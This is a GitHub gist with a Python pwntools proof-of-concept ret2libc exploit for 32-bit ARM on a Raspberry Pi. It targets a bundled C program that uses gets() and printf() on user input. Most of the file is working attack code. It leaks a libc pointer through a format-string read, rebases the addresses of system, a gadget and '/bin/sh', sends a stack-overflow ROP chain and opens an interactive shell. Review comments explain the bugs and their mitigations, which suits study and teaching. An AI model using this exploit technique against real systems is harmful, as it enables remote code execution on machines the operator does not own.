@Sinkmanu
Last active May 24, 2018 16:33
Ret2libc on Raspberry Pi (exploit proof of concept)
from pwn import *
# NOTE(review): proof-of-concept against the leak.c program quoted in the
# string below, kept here as a worked example of why two classic C bugs
# matter.  The C listing has two defects a compiler or linter already flags:
#   - gets(t) / gets(buff): gets() takes no length, so both reads can run
#     past their fixed-size stack buffers (modern glibc warns at link time).
#   - printf(t): user input used as the format string (-Wformat-security
#     reports this).  The "%27$p" sent below depends on it.
# Mitigations: read with fgets(buf, sizeof buf, stdin), print with
# printf("%s", t), and build with -fstack-protector-strong,
# -D_FORTIFY_SOURCE=2, PIE and full RELRO so a single leaked pointer is no
# longer enough to reach the rest of libc.
'''
// Raspberry pi:
// File: leak.c
// gcc leak.c -o leak
// socat -v tcp-listen:4444,reuseaddr,fork exec:"./leak"
#include <stdio.h>
int main(int argc, char *argv[]){
setbuf(stdout, 0);
char buff[64];
char t[10];
printf("Welcome\n");
gets(t);
printf(t);
printf("\n");
gets(buff);
return 0;
}
'''
# 32-bit ARM Linux target; pwntools derives p32()'s width and byte order from this.
context(arch = 'arm', os = 'linux')
# Connect to the socat listener from the leak.c header comment.
p = remote('192.168.2.230',4444)
p.recvline()  # consume the "Welcome\n" banner
# Format-string read: the server's printf(t) prints vararg slot 27 as a
# pointer.  Per the author's comment that slot holds a return address into
# libc (__libc_start_main + 276); presumably the slot number is specific to
# this binary's stack layout and would differ elsewhere.
p.sendline("%27$p") # leak __libc_start_main + 276
libc = p.recvline()  # hex text such as "0x..."; int(..., 16) tolerates the trailing newline
__libc_start_main = p32(int(libc, 16)) # -276   NOTE(review): assigned but never used below
# Rebase: leaked value - 276 is the __libc_start_main symbol; subtracting its
# offset in this libc build (the readelf -s line quoted in the comment) gives
# the library's load base.  Every constant below is tied to that exact libc.
libc_addr = int(libc, 16)-276 - 0x16564 # 2109: 00016564 608 FUNC GLOBAL DEFAULT 12 __libc_start_main@@GLIBC_2.4
system_addr = libc_addr + 0x37154 # 1343: 00037154 44 FUNC WEAK DEFAULT 12 system@@GLIBC_2.4
pop_r0_r4_pc = libc_addr + 0x7753c # 0x0007753c: pop {r0, r4, pc};
bin_sh = libc_addr + 0x11d588  # no symbol quoted for this one; presumably a "/bin/sh" string offset in the same libc
# Echo the rebased addresses so a failed run can be diagnosed.
log.success("libc addr: " + hex(libc_addr))
log.success("system addr: " + hex(system_addr))
log.success("gadget \"pop {r0, r4, pc}\": " + hex(pop_r0_r4_pc))
log.success("/bin/sh addr: " + hex(bin_sh))
# Second gets() call: the filler length and the ordering of gadget, argument
# and target are specific to this frame layout and libc.  Concatenating str
# with the bytes returned by p32() only works under Python 2 pwntools; on
# Python 3 this line raises TypeError.
p.sendline("A"*68+p32(pop_r0_r4_pc)+p32(bin_sh)+"AAAA"+p32(system_addr))
p.interactive()  # hand the socket to the user